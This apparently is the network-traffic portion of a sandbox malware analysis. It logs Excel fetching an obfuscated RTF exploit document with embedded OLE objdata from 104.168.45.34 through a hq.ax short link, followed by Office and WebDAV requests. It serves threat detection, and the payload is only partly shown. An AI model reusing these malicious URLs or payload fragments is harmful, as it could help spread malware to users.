Jul 26, 2024 13:03:13.189455986 CEST	8.8.8.8	192.168.2.22	0xc7ee	No error (0)	new.quranushaiqer.org.sa		34.166.62.190	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

hq.ax

asociatiatraditiimaria.ro

new.quranushaiqer.org.sa

104.168.45.34

198.46.176.133

geoplugin.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49161	188.114.96.3	80	2832	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:02:24.407691002 CEST	315	OUT	GET /Oi8 HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: hq.ax Connection: Keep-Alive
Jul 26, 2024 13:02:24.886981010 CEST	826	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 26 Jul 2024 11:02:24 GMT Content-Type: text/html Content-Length: 167 Connection: keep-alive Cache-Control: max-age=3600 Expires: Fri, 26 Jul 2024 12:02:24 GMT Location: https://hq.ax/Oi8 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cCONbcQvhT5RyplRQuLCw1tZ%2FdSVxceW5BX2PiCfylnZy5V%2BflZLF40VVA4nAsqO%2B0ZRgeTXGGCEYGL7rmq9FWsZIT9Sfn8Ro9TOvYxnQHJqGVT%2BLcdGKg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 8a93e5b52d1d7d0b-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49163	104.168.45.34	80	2832	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:02:26.689064026 CEST	476	OUT	GET /59/bn/createdgoodthingstogetmebacktheentirethingsinolineswitchtogilfrnfboobstounderstandhowfeelurareinthesituation_____________creanthesituationgirlfrnd.doc HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 104.168.45.34 Connection: Keep-Alive
Jul 26, 2024 13:02:27.204163074 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 11:02:27 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Fri, 26 Jul 2024 06:20:36 GMT ETag: "147c1-61e208271c231" Accept-Ranges: bytes Content-Length: 83905 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/msword Data Raw: 7b 5c 72 74 66 31 0d 09 09 09 09 09 09 09 09 09 09 7b 5c 2a 5c 66 6f 6e 74 69 6e 66 6f 36 39 35 33 31 34 32 32 33 20 5c 2c 7d 0d 7b 5c 39 38 30 30 36 36 39 35 30 60 2d 40 21 5f b0 29 3b 5e 5f 3f 35 60 25 5b 3f 7e 2d 3c 33 26 35 2c 37 5e 2c 3e b0 5b 23 3a 25 30 3b 28 5e 60 a7 5b 36 5b 39 23 5e 30 3c 3f 7c 5d 5d 5b 24 7e 26 33 3a 2b 2a 34 32 34 60 3f 2a 32 33 24 30 3f 3f 26 2a 3a 24 2f 2c 3c 5e 39 3f b0 5d 3f 3c 7c 5f 3d 33 2e 38 38 5f 3f 3a 3f 25 26 30 2e 32 3a 2f 21 28 2a 7e 3a 3c 3c b5 3e b0 39 2d 7e 25 a7 a7 28 3f 26 39 35 3f 2d 3b 25 2d 32 5e 3f 29 3f 2f 3d 38 5b 5d 2a 28 2e 3a 7e 3d 2b 3f 24 3f 35 2b 3f 3c 7c 29 5d 3f 24 34 27 5e 5f 40 33 2e 5f 36 3b 5b 26 2b 5e 32 5f 37 28 3d 34 23 27 27 a7 3f 3d a7 5b 2f 3f 5b a7 21 35 27 a7 40 5d 3f 2a 2c 29 2d 36 5e 2d 38 2b 2f 3b 3d 3e 5d 2a 37 3f 5e 23 34 a7 3f b5 3a 24 23 26 37 2f 7c 5d 2b 5e 3f 25 2f 3f 3f 5e 2e 37 24 34 3a 2f 31 25 3a 2a 32 38 2c 5b 3a 25 b0 28 37 b0 2d 25 2d 5e 34 29 33 35 3f 3d b5 2d 34 31 21 b0 21 7c 5e 31 5e 21 2d 23 29 40 b5 29 7e [TRUNCATED] Data Ascii: {\rtf1{\\fontinfo695314223 \,}{\980066950`-@!_);^_?5`%[?~-<3&5,7^,>[#:%0;(^`[6[9#^0<?\|]][$~&3:+424`?23$0??&:$/,<^9?]?<\|_=3.88_?:?%&0.2:/!(~:<<>9-~%(?&95?-;%-2^?)?/=8[](.:~=+?$?5+?<\|)]?$4'^_@3._6;[&+^2_7(=4#''?=[/?[!5'@]?,)-6^-8+/;=>]7?^#4?:$#&7/\|]+^?%/??^.7$4:/1%:28,[:%(7-%-^4)35?=-41!!\|^1^!-#)@)~$)\|7='232-3)86&#5:~`-0/@,?\|)^59_-62_2_5$5!(6]`'9]?`3925$2?$#,39?6?!%2$^^~?7?;&+++5'%;$)?<=?%>!.52^>?:%>8+?0_?83%!+[8?2]8(#=??%0(/3,[>>\|?]?(?`,]!:53?_9?)+5&=^2.2?0:?583!.?:#+!)8%\|??$++?$(?5#@\|?4-@1$8?~5'?^^(?3??4/_@+@~@\|_?%(1?`[4<'-./?&)__?314<-+7$6?~:+956:?;:6%5,>,[.$['30$$\|$#1/=%6/!(%=(?%?(;6%&8]>%<36=%@.?[17#[?7`,?#[=]'0/6]>891%31+?,!\|?.<%`8<,?>@-1]5398/?+_~%(?-)+\|?++3+\|_]'>]+%91`!-4?>^+@?):<-^%>??=?8.?/%4<!+5$&/??(<00/%+9$]~\|?#>1:!@]?^?/]>?0$&98[]/,;)33@?!/8371%,/0=//!?<?8@~?(*_>7:?1!!=3]\|&/0^5:)#5?$$7^?.\|@1(22_?4-37
Jul 26, 2024 13:02:27.204186916 CEST	1236	IN	Data Raw: 3a 3f 3e 3f 3f 21 3f 3f 33 38 b5 5f 25 7e 5e 2d 23 2a 37 21 a7 26 38 3f 21 b0 b5 b0 3c 3b 29 2a b5 3a 5d 29 2f 38 26 3f 3c 3f 5d 3f 5f 2a 25 b0 3d 2e 2f 3c 33 a7 5b 2f a7 39 24 3f 37 35 33 28 7e 34 26 b0 36 5d 3f 5d 3f 35 39 60 40 2a 3f 28 40 2d Data Ascii: :?>??!??38_%~^-#7!&8?!<;):])/8&?<?]?_%=./<3[/9$?753(~4&6]?]?59`@?(@-42?+?^6!@)1]%]616^<_\|~(#%-+4,5'<?-[?9=90\|2^'+$#.:,$[\|2!?\|`?>?!.4)~&#[%?\|'-#41^30_6)<=)>?;?@5]&?$=^+?33.+472:.'?<:?6$,],?1???9>?>+*?#8,[&=6?>#-?
Jul 26, 2024 13:02:27.204226971 CEST	1236	IN	Data Raw: 3f 33 3f 3e 3c 2a 29 3f 3f 27 3f 37 b0 5b 3f 7e 3c 5e b5 2b 5e 3f 7c 3b 34 29 38 25 34 37 28 28 25 21 3f 27 25 2e 33 5f 30 3b 7e 27 5f 25 37 38 33 b0 2e 60 24 2e 5e 3f 34 3f 3c 25 25 33 2f 30 2c b5 a7 a7 26 a7 a7 25 2d 5b 3f 3f 5f 25 5e 3f 2f 3b Data Ascii: ?3?><)??'?7[?~<^+^?\|;4)8%47((%!?'%.3_0;~'_%783.`$.^?4?<%%3/0,&%-[??_%^?/;4&;:,.8-3<#81[5?.:[?=32\|1=5<5>1%1?-0441+56'2)~-?2:/?+$7~:-?[#14?6?4?3'-0='67]~0<_+?,(1%$5?4,_\|^?0+#2~#-2.2/#%6+2?_>07<?'6^6\|?\|99<5<$++-?>6!;@??6
Jul 26, 2024 13:02:27.204243898 CEST	1236	IN	Data Raw: 5d 34 26 3f 5e 3c 34 31 2b 3f 2e 30 38 5b 32 5b 23 2b 25 34 7e 3f 3a 21 23 2b 2a 3f 5f 3b 33 b0 3f 32 a7 30 26 25 2e 3f 3d 3f 25 b5 3d 25 7c 3f 26 60 3c 33 a7 3a 3f 33 3a 34 2d 32 3b 60 7e 3f 38 33 32 3e 3f 24 3f 2c 2b 40 38 3a 7c 2c 5d 2c 2c b5 Data Ascii: ]4&?^<41+?.08[2[#+%4~?:!#+?_;3?20&%.?=?%=%\|?&`<3:?3:4-2;`~?832>?$?,+@8:\|,],,<_?4%]3?>'`,\|?=)'9\|+!>\|?$;._?&%7#?:_=::;_1-0[4-/[?&=,/+/%-`?<0.,@?~/8&+=$\|;\|4?#0'%,7?<,?:5?_?9'6~~%&=#;~?3]#08+]>4.)??;.:0%)5*?0?8)28-~-?0?[1:/=1^1
Jul 26, 2024 13:02:27.204258919 CEST	1236	IN	Data Raw: 7e 36 3f 2b 3d 25 5d b0 30 b5 5e 2d 24 60 25 40 35 32 5d 3f 3f 2f 5e 7c 3e 31 28 33 5e 31 3f 3f 24 2f 2e 5b 5f 25 3f 25 35 39 3a 2f 24 2f 25 26 23 7e 2a 7e 2f 38 29 27 29 3f 32 30 33 5b 40 3f 33 30 3f 3f 26 25 3e 3f 33 36 3f 3f 2a 2a 27 2f b5 31 Data Ascii: ~6?+=%]0^-$`%@52]??/^\|>1(3^1??$/.[_%?%59:/$/%&#~~/8)')?203[@?30??&%>?36??'/1;2?#~&$6'>=+;&?$'$0$&3@4-$%3,5+>8^?~\|(%`)4<5'!:^6,.?4+)~];??8+:?5^#::?;?77/8?(2_18#??5%?$?$5'[08_$9$@=7-%[\|7,%#@6%'6&%68/9$$?4>]!770)<8`%45%\|__~49489
Jul 26, 2024 13:02:27.204273939 CEST	1236	IN	Data Raw: 3e 3f 3c 36 34 2b 2f 5d 3e 2f 28 5e 3c 3f 3f 3f 3f 3e 2d 21 7e a7 b5 7c 36 40 2f 5f 37 25 5e 7e 28 39 28 39 24 2b 39 36 38 5b 40 2a 29 5b a7 2d 21 27 25 3f 25 5d 2e b5 7c 27 2e 31 31 33 3a 3b 21 35 24 3f a7 3f b5 2f 28 37 2e 21 5d 23 38 2c 3c 5e Data Ascii: >?<64+/]>/(^<????>-!~\|6@/_7%^~(9(9$+968[@)[-!'%?%].\|'.113:;!5$??/(7.!]#8,<^8[291&~]?5^_;?_1<\|^^&%:?14#\|=?\|++;;;7.]3.!=5>_?()2>,?^,-#9>?`$97<)_?(?\object60816881\objhtml99957165\objw453\objh3088{\\objupdate36413641\\objdata307438
Jul 26, 2024 13:02:27.204289913 CEST	1236	IN	Data Raw: 09 20 20 09 09 09 09 09 09 20 09 09 09 20 30 20 09 09 09 09 20 20 20 20 20 09 20 09 09 20 09 20 20 20 20 20 20 09 20 09 20 20 20 20 20 20 09 20 09 09 20 20 20 09 20 09 20 09 09 20 09 09 09 09 09 20 20 20 20 09 20 20 09 09 09 09 09 09 20 09 09 09 Data Ascii: 0 0457155617 4696f4e
Jul 26, 2024 13:02:27.204858065 CEST	1236	IN	Data Raw: 0a 0a 0d 0a 0d 0d 32 37 20 20 20 20 20 09 20 09 20 20 09 20 09 20 20 20 20 20 20 09 20 09 20 09 20 09 20 20 09 20 20 09 20 09 20 20 20 20 20 09 09 20 20 20 09 20 09 09 20 20 09 09 20 20 09 20 20 09 20 20 20 09 20 09 20 20 09 20 31 0a 0a 0d 0a 0a Data Ascii: 27 14ad a963301
Jul 26, 2024 13:02:27.204873085 CEST	1236	IN	Data Raw: 0a 0a 0d 0d 64 61 61 09 20 20 20 09 20 09 20 20 09 09 20 20 09 09 09 09 20 20 09 09 20 09 20 20 20 20 09 20 09 09 09 09 20 20 20 20 20 09 09 20 20 20 20 20 20 20 20 09 20 20 20 09 20 09 09 09 09 09 20 20 20 20 09 09 20 09 09 34 65 0d 0a 0d 0a 0d Data Ascii: daa 4e4 8 1
Jul 26, 2024 13:02:27.204890013 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 09 09 09 20 09 09 09 09 09 20 20 20 20 09 09 20 09 09 30 0d 0d 0d 0d 0d 0d 0a 0a 0a 0d 0d 0d 0a 0d 0d 0a 0a 0d 0a 0d 0d 30 0d 0a 0a 0a 0a 0a 0d 0a 0d 0d 0d 0d 0a 0a 0a 0d 0d 0d 0a 0d 0d 32 65 61 31 0d 0d 0a 0a 0a 0a 0d 0a 0a 0d Data Ascii: 002ea18443d0c324edb
Jul 26, 2024 13:02:27.209261894 CEST	1236	IN	Data Raw: 20 09 09 20 20 20 09 20 20 20 20 09 20 09 20 20 20 09 09 20 09 09 61 30 37 66 35 63 64 38 61 38 09 09 20 20 20 09 09 20 20 09 09 20 09 09 09 09 09 09 20 20 09 20 20 20 20 20 20 20 09 20 09 20 20 20 20 20 09 09 20 09 09 09 09 20 20 20 20 09 09 20 Data Ascii: a07f5cd8a8 6 c7411f2e5

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.22	49164	188.114.96.3	80	3100	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:02:27.728749990 CEST	127	OUT	OPTIONS / HTTP/1.1 User-Agent: Microsoft Office Protocol Discovery Host: hq.ax Content-Length: 0 Connection: Keep-Alive
Jul 26, 2024 13:02:28.223129034 CEST	796	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 26 Jul 2024 11:02:28 GMT Content-Type: text/html Content-Length: 167 Connection: keep-alive Cache-Control: max-age=3600 Expires: Fri, 26 Jul 2024 12:02:28 GMT Location: https://hq.ax/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i0GV2gsQtjc3bRGPR1mTCUcw5m46uzhZKvO5r8UXuNa2IHjHNK6b6UDQzWTOHIe2YWR8dWYZ7yTHN8%2BroppbZUPbijlaZM6FR1xm3Y4vOrPBHoSJugu%2Fqg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a93e5c9fe441801-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
Jul 26, 2024 13:02:28.465903044 CEST	127	OUT	OPTIONS / HTTP/1.1 User-Agent: Microsoft Office Protocol Discovery Host: hq.ax Content-Length: 0 Connection: Keep-Alive
Jul 26, 2024 13:02:28.570208073 CEST	798	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 26 Jul 2024 11:02:28 GMT Content-Type: text/html Content-Length: 167 Connection: keep-alive Cache-Control: max-age=3600 Expires: Fri, 26 Jul 2024 12:02:28 GMT Location: https://hq.ax/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MlVgPmj3mRy%2BhDRFZY16bglEoDIQy%2B5cyYqk1naWKfwpo3k511uM9xDbhWo8xX1GzAu%2FtREf0HRef7APxl1UEkYD9ALR6H3G1RV5ICnZGyrtTAn3XQawow%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a93e5cc3f581801-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
Jul 26, 2024 13:02:28.579711914 CEST	127	OUT	OPTIONS / HTTP/1.1 User-Agent: Microsoft Office Protocol Discovery Host: hq.ax Content-Length: 0 Connection: Keep-Alive
Jul 26, 2024 13:02:28.682288885 CEST	804	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 26 Jul 2024 11:02:28 GMT Content-Type: text/html Content-Length: 167 Connection: keep-alive Cache-Control: max-age=3600 Expires: Fri, 26 Jul 2024 12:02:28 GMT Location: https://hq.ax/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ESdO7x9isuHNk1hlXMnIp%2Fqi0OFyXbr5xurn%2BKseq8F9dxs4xA5wYec39y5WFDV%2B4jY1DTX6D%2BR1Lu7oe%2FxwVjSVr%2B9iJVn7Drr12YwDITdXJHco54k1bg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a93e5ccefdd1801-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
Jul 26, 2024 13:02:39.317632914 CEST	128	OUT	HEAD /Oi8 HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: hq.ax Content-Length: 0 Connection: Keep-Alive
Jul 26, 2024 13:02:39.421174049 CEST	632	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 26 Jul 2024 11:02:39 GMT Content-Type: text/html Content-Length: 167 Connection: keep-alive Cache-Control: max-age=3600 Expires: Fri, 26 Jul 2024 12:02:39 GMT Location: https://hq.ax/Oi8 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ib%2FlNHeSLB0bJ9Nh0t0x6PDZPoDZ6w0vYMdvTJTexFeKcdDnlYQGdM6XgWCFKFdgQ7WVLO9WyzZDXnh%2FeEjw4llKK9arl8mxUcn1IFPJiUfuyu5Wf9zkEQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a93e6100d4c1801-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.22	49165	188.114.96.3	80	3100	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:02:28.792927027 CEST	109	OUT	HEAD /Oi8 HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft Office Existence Discovery Host: hq.ax
Jul 26, 2024 13:02:29.295759916 CEST	636	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 26 Jul 2024 11:02:29 GMT Content-Type: text/html Content-Length: 167 Connection: keep-alive Cache-Control: max-age=3600 Expires: Fri, 26 Jul 2024 12:02:29 GMT Location: https://hq.ax/Oi8 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y%2B1lnpibuAhsebeAj5hZW05HR7KWMrsuYAetylhsVQmgB6IooAtQtyg0lICCpdiWEQPZWnqmj9Y%2FrRSUSWoZK%2Byo7raqBsYm%2BDAB1JFC72ffCOiJBcfp5A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a93e5d0a898443e-EWR alt-svc: h3=":443"; ma=86400
Jul 26, 2024 13:02:29.506656885 CEST	636	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 26 Jul 2024 11:02:29 GMT Content-Type: text/html Content-Length: 167 Connection: keep-alive Cache-Control: max-age=3600 Expires: Fri, 26 Jul 2024 12:02:29 GMT Location: https://hq.ax/Oi8 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y%2B1lnpibuAhsebeAj5hZW05HR7KWMrsuYAetylhsVQmgB6IooAtQtyg0lICCpdiWEQPZWnqmj9Y%2FrRSUSWoZK%2Byo7raqBsYm%2BDAB1JFC72ffCOiJBcfp5A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a93e5d0a898443e-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.22	49168	188.114.96.3	80

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:02:33.929651022 CEST	122	OUT	OPTIONS / HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601 translate: f Host: hq.ax
Jul 26, 2024 13:02:34.404669046 CEST	802	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 26 Jul 2024 11:02:34 GMT Content-Type: text/html Content-Length: 167 Connection: keep-alive Cache-Control: max-age=3600 Expires: Fri, 26 Jul 2024 12:02:34 GMT Location: https://hq.ax/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pN%2B%2FBLUx%2FXuBaHdBrXe0bFSQuBY5XSAzkfoGKpJbaeMF13DfSzZXi62BeTPqUBt4sBIVFCwdCHL4BLRUdZaaFZUHaHZ9LnqgB%2BviV5KrfV8I%2BStoJABOUg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a93e5f0af458c2d-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
Jul 26, 2024 13:02:35.532185078 CEST	152	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: hq.ax
Jul 26, 2024 13:02:35.633759022 CEST	802	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 26 Jul 2024 11:02:35 GMT Content-Type: text/html Content-Length: 167 Connection: keep-alive Cache-Control: max-age=3600 Expires: Fri, 26 Jul 2024 12:02:35 GMT Location: https://hq.ax/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WmwLi1vmq%2BZ5atpqEiaNcgbMoKdiOdHgyzGNP%2BBjio9LNC9Wj%2FIlHBIXQdv5YjyEeyCkEXeNHmRP5f3XHINwB4Os8jF%2BMuAnO5QrwaeOhKGJmg33AUZU%2FA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a93e5f86cf48c2d-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
Jul 26, 2024 13:02:35.932014942 CEST	802	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 26 Jul 2024 11:02:35 GMT Content-Type: text/html Content-Length: 167 Connection: keep-alive Cache-Control: max-age=3600 Expires: Fri, 26 Jul 2024 12:02:35 GMT Location: https://hq.ax/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WmwLi1vmq%2BZ5atpqEiaNcgbMoKdiOdHgyzGNP%2BBjio9LNC9Wj%2FIlHBIXQdv5YjyEeyCkEXeNHmRP5f3XHINwB4Os8jF%2BMuAnO5QrwaeOhKGJmg33AUZU%2FA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a93e5f86cf48c2d-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 